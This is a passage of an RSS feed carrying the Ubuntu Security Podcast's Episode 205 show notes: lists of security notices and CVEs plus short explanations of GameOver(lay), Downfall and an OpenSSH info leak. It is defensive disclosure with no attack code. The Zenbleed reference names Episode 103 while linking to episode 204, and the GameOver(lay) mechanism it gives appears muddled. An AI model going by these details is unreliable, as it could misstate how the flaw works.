<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E206.mp3" length="26979103" type="audio/mpeg" /><itunes:duration>958</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 205
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-205/</link>
          <pubDate>Fri, 18 Aug 2023 18:29:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>e3ec3f4d79d0c96ae9635469aa20e7c0107c0e185f8624c0129b0a00bafd40d18e873cb042e725182616010769e27668cea5317d4120b1d066629757f28868d6</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 205</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          We're back after unexpectedly going AWOL last week to bring you the latest in
  Ubuntu Security including the recently announced Downfall and GameOver(lay)
  vulnerabilities, plus we look at security updates for OpenSSH and GStreamer **and**...
        
        ]]></itunes:subtitle>
        <itunes:summary>  We're back after unexpectedly going AWOL last week to bring you the latest in
  Ubuntu Security including the recently announced Downfall and GameOver(lay)
  vulnerabilities, plus we look at security updates for OpenSSH and GStreamer **and**
  we detail plans for using AppArmor to restrict the use of unprivileged user
  namespaces as an attack vector in future Ubuntu releases.
  </itunes:summary>
        <description>  We're back after unexpectedly going AWOL last week to bring you the latest in
  Ubuntu Security including the recently announced Downfall and GameOver(lay)
  vulnerabilities, plus we look at security updates for OpenSSH and GStreamer **and**
  we detail plans for using AppArmor to restrict the use of unprivileged user
  namespaces as an attack vector in future Ubuntu releases.
  </description>
        <googleplay:description>  We're back after unexpectedly going AWOL last week to bring you the latest in
  Ubuntu Security including the recently announced Downfall and GameOver(lay)
  vulnerabilities, plus we look at security updates for OpenSSH and GStreamer **and**
  we detail plans for using AppArmor to restrict the use of unprivileged user
  namespaces as an attack vector in future Ubuntu releases.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>We&rsquo;re back after unexpectedly going AWOL last week to bring you the latest in
Ubuntu Security including the recently announced Downfall and GameOver(lay)
vulnerabilities, plus we look at security updates for OpenSSH and GStreamer <strong>and</strong>
we detail plans for using AppArmor to restrict the use of unprivileged user
namespaces as an attack vector in future Ubuntu releases.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>143 unique CVEs addressed</p>
<h3 id="usn-6268-1-usn-6269-1-gstreamer-base-and-good-plugins-vulnerabilities--01-07">[<a href="https://ubuntu.com/security/notices/USN-6268-1">USN-6268-1</a>, <a href="https://ubuntu.com/security/notices/USN-6269-1">USN-6269-1</a>] GStreamer Base and Good Plugins vulnerabilities (01:07)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-37328">CVE-2023-37328</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-37327">CVE-2023-37327</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Both CVEs discovered by an independent security researcher and reported via
ZDI (<a href="https://www.zerodayinitiative.com/advisories/ZDI-23-903/">ZDI-CAN-20775</a>, <a href="https://www.zerodayinitiative.com/advisories/ZDI-23-901/">ZDI-CAN-20994</a>)</li>
<li>Used by the built-in Videos app (aka totem) which can play streaming videos
(even has a default plugin providing integration with Apple Video Trailers and
others) - so could possibly be used for remote exploitation</li>
<li>Integer overflow -&gt; buffer overflow -&gt; RCE in FLAC audio decoder</li>
<li>Buffer overflow in PGS subtitle handler - failed to validate length before
copying -&gt; heap buffer overflow -&gt; RCE</li>
</ul>
<h3 id="usn-6270-1-vim-vulnerabilities--02-49">[<a href="https://ubuntu.com/security/notices/USN-6270-1">USN-6270-1</a>] Vim vulnerabilities (02:49)</h3>
<ul>
<li>11 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2287">CVE-2022-2287</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2286">CVE-2022-2286</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2285">CVE-2022-2285</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2289">CVE-2022-2289</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2284">CVE-2022-2284</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2264">CVE-2022-2264</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2257">CVE-2022-2257</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2231">CVE-2022-2231</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2210">CVE-2022-2210</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2208">CVE-2022-2208</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2182">CVE-2022-2182</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest round of vim vulns - all via the bug bounty program and from just 3
researchers - would be interesting to know what kind of bounties are payed out
for these &ldquo;vulns&rdquo; since most require the user to run vim with a crafted set of
commands against a crafted input file - if you can get someone to do that, you
can probably just write arbitrary shell code for them to execute as well&hellip;</li>
</ul>
<h3 id="usn-6271-1-maradns-vulnerabilities--03-55">[<a href="https://ubuntu.com/security/notices/USN-6271-1">USN-6271-1</a>] MaraDNS vulnerabilities (03:55)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-31137">CVE-2023-31137</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30256">CVE-2022-30256</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6272-1-openjdk-20-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6272-1">USN-6272-1</a>] OpenJDK 20 vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-25193">CVE-2023-25193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22049">CVE-2023-22049</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22045">CVE-2023-22045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22044">CVE-2023-22044</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22041">CVE-2023-22041</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22036">CVE-2023-22036</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22006">CVE-2023-22006</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>20.0.2</li>
</ul>
<h3 id="usn-5064-3-gnu-cpio-vulnerability--04-08">[<a href="https://ubuntu.com/security/notices/USN-5064-3">USN-5064-3</a>] GNU cpio vulnerability (04:08)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38185">CVE-2021-38185</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-130/#usn-5064-1-gnu-cpio-vulnerability-04-13">[USN-5064-1] GNU cpio vulnerability from Episode 130</a> - integer overflow -&gt;
heap buffer overflow if using untrusted pattern files</li>
</ul>
<h3 id="usn-6275-1-cargo-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6275-1">USN-6275-1</a>] Cargo vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-38497">CVE-2023-38497</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6273-1-poppler-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6273-1">USN-6273-1</a>] poppler vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-34872">CVE-2023-34872</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27337">CVE-2022-27337</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6274-1-xmltooling-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6274-1">USN-6274-1</a>] XMLTooling vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-36661">CVE-2023-36661</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6276-1-unixodbc-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6276-1">USN-6276-1</a>] unixODBC vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-7409">CVE-2018-7409</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6267-2-firefox-regressions">[<a href="https://ubuntu.com/security/notices/USN-6267-2">USN-6267-2</a>] Firefox regressions</h3>
<ul>
<li>12 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4050">CVE-2023-4050</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4046">CVE-2023-4046</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4045">CVE-2023-4045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4058">CVE-2023-4058</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4057">CVE-2023-4057</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4056">CVE-2023-4056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4055">CVE-2023-4055</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4053">CVE-2023-4053</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4051">CVE-2023-4051</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4049">CVE-2023-4049</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4048">CVE-2023-4048</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4047">CVE-2023-4047</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6277-1-usn-6277-2-dompdf-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6277-1">USN-6277-1</a>, <a href="https://ubuntu.com/security/notices/USN-6277-2">USN-6277-2</a>] Dompdf vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2400">CVE-2022-2400</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3838">CVE-2021-3838</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2014-5013">CVE-2014-5013</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2014-5012">CVE-2014-5012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2014-5011">CVE-2014-5011</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6278-1-usn-6278-2-dot-net-vulnerabilities--04-41">[<a href="https://ubuntu.com/security/notices/USN-6278-1">USN-6278-1</a>, <a href="https://ubuntu.com/security/notices/USN-6278-2">USN-6278-2</a>] .NET vulnerabilities (04:41)</h3>
<ul>
<li>3 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-38180">CVE-2023-38180</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38178">CVE-2023-38178</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35390">CVE-2023-35390</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6279-1-openssh-update--04-53">[<a href="https://ubuntu.com/security/notices/USN-6279-1">USN-6279-1</a>] OpenSSH update (04:53)</h3>
<ul>
<li>Affecting Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)</li>
<li>Possible info leak during algorithm negotiation - related to <a href="https://ubuntu.com/security/CVE-2020-14145">CVE-2020-14145</a> -
which is a low priority vulnerability where it is possible for a person in the
middle to determine if a client already has knowledge of the server&rsquo;s host
key. This could be used to then attack clients which do not have this
knowledge (since they then will be prompted to accept and trust the host key
which is offered on first connection) and offer them an attacker chosen host
key to cause them to authenticate to a host controlled by the attacker and
therefore intercept their connection etc</li>
<li>There is a partial mitigation in the form of a client change so that if the
client does already have the server&rsquo;s host key, it will still preserve the
original algorithm ordering sent to the server and so not leak this
information.</li>
<li>This is not a complete fix for this issue since it only mitigates some of the
use-cases of the original vuln.</li>
</ul>
<h3 id="usn-4336-3-gnu-binutils-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4336-3">USN-4336-3</a>] GNU binutils vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-6323">CVE-2018-6323</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9756">CVE-2017-9756</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9750">CVE-2017-9750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9748">CVE-2017-9748</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9747">CVE-2017-9747</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9742">CVE-2017-9742</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6243-2-graphite-web-regression">[<a href="https://ubuntu.com/security/notices/USN-6243-2">USN-6243-2</a>] Graphite-Web regression</h3>
<ul>
<li>4 CVEs addressed in Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-4730">CVE-2022-4730</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4729">CVE-2022-4729</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4728">CVE-2022-4728</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-18638">CVE-2017-18638</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6281-1-velocity-engine-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6281-1">USN-6281-1</a>] Velocity Engine vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-13936">CVE-2020-13936</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6282-1-velocity-tools-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6282-1">USN-6282-1</a>] Velocity Tools vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-13959">CVE-2020-13959</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6283-1-linux-kernel-vulnerabilities--07-34">[<a href="https://ubuntu.com/security/notices/USN-6283-1">USN-6283-1</a>] Linux kernel vulnerabilities (07:34)</h3>
<ul>
<li>13 CVEs addressed in Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35829">CVE-2023-35829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35828">CVE-2023-35828</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35826">CVE-2023-35826</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35824">CVE-2023-35824</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35823">CVE-2023-35823</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3317">CVE-2023-3317</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3312">CVE-2023-3312</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3268">CVE-2023-3268</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32254">CVE-2023-32254</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32248">CVE-2023-32248</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3141">CVE-2023-3141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2269">CVE-2023-2269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2002">CVE-2023-2002</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6284-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6284-1">USN-6284-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>16 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-33203">CVE-2023-33203</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3141">CVE-2023-3141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3111">CVE-2023-3111</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30772">CVE-2023-30772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28466">CVE-2023-28466</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2194">CVE-2023-2194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2124">CVE-2023-2124</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1990">CVE-2023-1990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1855">CVE-2023-1855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1611">CVE-2023-1611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0590">CVE-2023-0590</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4269">CVE-2022-4269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27672">CVE-2022-27672</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1184">CVE-2022-1184</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0168">CVE-2022-0168</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36691">CVE-2020-36691</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6285-1-linux-kernel--oem--vulnerabilities--07-50">[<a href="https://ubuntu.com/security/notices/USN-6285-1">USN-6285-1</a>] Linux kernel (OEM) vulnerabilities (07:50)</h3>
<ul>
<li>
<p>14 CVEs addressed in Jammy (22.04 LTS)</p>
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3863">CVE-2023-3863</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38432">CVE-2023-38432</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38430">CVE-2023-38430</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3611">CVE-2023-3611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3610">CVE-2023-3610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3609">CVE-2023-3609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35001">CVE-2023-35001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3390">CVE-2023-3390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32629">CVE-2023-32629</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31248">CVE-2023-31248</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2898">CVE-2023-2898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2640">CVE-2023-2640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48502">CVE-2022-48502</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>
<p>6.1 kernel</p>
</li>
<li>
<p>8 different high priority vulns - most mentioned previously - does include
&ldquo;<a href="https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability">GameOver(lay)</a>&rdquo; which we haven&rsquo;t covered yet - reported by WizResearch and is
specific to Ubuntu kernels</p>
</li>
<li>
<p>OverlayFS is a union filesystem which allows multiple filesystems to be
mounted at the same time, and presents a single unified view of the
filesystems. In 2018 we introduced some changes to OverlayFS as SAUCE patches
to handle extended attributes in overlayfs. Then in 2020 we backported commits
to fix <a href="https://ubuntu.com/security/CVE-2021-3493">CVE-2021-3493</a> - in the process this also added support for extended
attributes in OverlayFS so now there were two code paths, each using different
implementations for extended attributes. One was protected against the vuln in
<a href="https://ubuntu.com/security/CVE-2021-3493">CVE-2021-3493</a> whilst the other was not.</p>
</li>
<li>
<p>This vulnerability is exploiting that same vulnerability in the unprotected
implementation.</p>
</li>
<li>
<p>In this case, the vulnerability is in the handling of extended attributes in
OverlayFS - the vulnerability is that it is possible to create a file with
extended attributes which are not visible to the user, and then mount that
file in a way which allows the extended attributes to be visible to the user</p>
<ul>
<li>this is done by mounting the file with the <code>nosuid</code> option, and then</li>
</ul>
<p>remounting it with <code>suid</code> option. This allows the user to then execute arbitrary
code as root. NOTE: requires the user to have the ability to have
<code>CAP_SYS_ADMIN</code> but this is easy with unprivileged user namespaces.</p>
</li>
<li>
<p>Even more reason to keep pursuing the effort to restrict the use of
unprivileged user namespaces in upcoming Ubuntu 23.10</p>
</li>
</ul>
<h3 id="usn-6286-1-intel-microcode-vulnerabilities--10-59">[<a href="https://ubuntu.com/security/notices/USN-6286-1">USN-6286-1</a>] Intel Microcode vulnerabilities (10:59)</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-23908">CVE-2023-23908</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41804">CVE-2022-41804</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40982">CVE-2022-40982</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Gather data sampling (aka &ldquo;<a href="https://downfall.page/">Downfall</a>&rdquo;) - another microarchitectural CPU
vulnerability - the last one we saw was <a href="/episode-204/#usn-6244-1-amd-microcode-vulnerability-05-57">Zenbleed from Episode 103</a> in AMD Zen2 CPUs</li>
<li>This time in Intel hardware (6th to 11th generation) CPUs</li>
<li>Presented at BlackHat just over 1 week ago -
<a href="https://www.blackhat.com/us-23/briefings/schedule/#single-instruction-multiple-data-leaks-in-cutting-edge-cpus-aka-downfall-31490">https://www.blackhat.com/us-23/briefings/schedule/#single-instruction-multiple-data-leaks-in-cutting-edge-cpus-aka-downfall-31490</a></li>
<li>Similar to Zenbleed in a way, since both are related to the SIMD instruction
set (single instruction, multiple data) - these instructions are used to
perform the same operation on multiple data elements simultaneously
(e.g. adding two vectors of 4 32-bit integers together) which is very useful
for things like video encoding/decoding, image processing, etc.</li>
<li>As the name, <strong>Gather data sampling</strong> suggests, the fault in this case is in the
SIMD Gather instruction which is used to load data into a vector register from
a memory location specified by an index vector register. Essentially this
allows the efficient loading of data which is scattered across memory into a
single register to then perform further operations on, and is useful in many
applications. The vulnerability is that under speculative execution, the data
which is loaded could be stale and come from an address which is not
accessible to the current process, and the data could be used in further
operations which could then leak the contents of that inaccessible memory -
e.g. stealing cryptographic keys from another process.</li>
<li>The fix in this case was a microcode update, which stops the CPU from
speculatively executing the Gather instruction, and instead waits for the data
to be available before executing the instruction. This results in a
performance hit, which was measured at up to 50% in a small number of
use-cases (whilst in others it is negligible).</li>
<li>Perhaps the most interesting part of this vulnerability is the timeline - it
was reported to Intel on 24th August 2022 yet only fixed publicly on 8th
August 2023 - basically meaning it took a year for Intel to fix this
issue.</li>
<li>Associated with the microcode update is a kernel patch - this allows the
microcode fix to be reverted at boot by a new kernel command line option:
<code>gather_data_sampling=off</code> - this is useful for those who want to avoid the
performance hit, and are willing to accept the risk of the vulnerability.</li>
<li>Ubuntu kernels have not yet been updated with this fix but that should arrive
within the next week (ie. week of 21st August)</li>
</ul>
<h3 id="usn-6280-1-pypdf2-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6280-1">USN-6280-1</a>] PyPDF2 vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-36810">CVE-2023-36810</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6287-1-go-yaml-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6287-1">USN-6287-1</a>] Go yaml vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3064">CVE-2022-3064</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4235">CVE-2021-4235</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4897-2-pygments-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4897-2">USN-4897-2</a>] Pygments vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-20270">CVE-2021-20270</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-27291">CVE-2021-27291</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-110/#usn-4897-1-pygments-vulnerability-06-03">[USN-4897-1] Pygments vulnerability from Episode 110</a> - ReDoS</li>
</ul>
<h3 id="usn-6288-1-mysql-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6288-1">USN-6288-1</a>] MySQL vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-22058">CVE-2023-22058</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22057">CVE-2023-22057</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22056">CVE-2023-22056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22054">CVE-2023-22054</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22053">CVE-2023-22053</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22048">CVE-2023-22048</a> <!-- raw HTML omitted --></li>
